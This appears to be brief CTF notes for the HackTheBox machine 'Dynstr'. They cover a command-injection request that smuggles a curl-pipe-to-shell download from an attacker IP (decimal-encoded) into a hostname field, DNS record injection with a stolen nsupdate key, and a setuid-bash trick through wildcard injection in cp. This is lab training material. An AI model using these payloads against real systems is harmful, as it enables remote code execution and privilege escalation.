Post

Dynamic DNS & Command Injection - Dynstr @ HackTheBox

We are solving Dynstr, a 30-point Linux machine on HackTheBox that involves a Dynamic DNS Service & a Command Injection.

Notes

Command Injection

1
GET /nic/update?hostname=$(curl+168431223/x|sh).no-ip.htb&myip=10.10.14.119 HTTP/1.1

Convert IP to decimal:

1
struct.unpack("!L", socket.inet_aton("10.10.14.119"))[0]

DNS Updates

1
2
echo "local 127.0.0.1\nupdate add xct.infra.dyna.htb 30 IN A 10.10.14.119\nsend\n" | /usr/bin/nsupdate -k /etc/bind/infra.key
echo "server 127.0.0.1\nzone 10.in-addr.arpa\nupdate add 119.14.10.10.in-addr.arpa. 30 PTR xct.infra.dyna.htb\nsend\n" | /usr/bin/nsupdate -k /etc/bind/infra.key

Wildcard Injection in “cp”

1
2
3
cp /bin/bash .
chmod 4777 bash
touch -- --preserve=mode
This post is licensed under CC BY 4.0 by the author.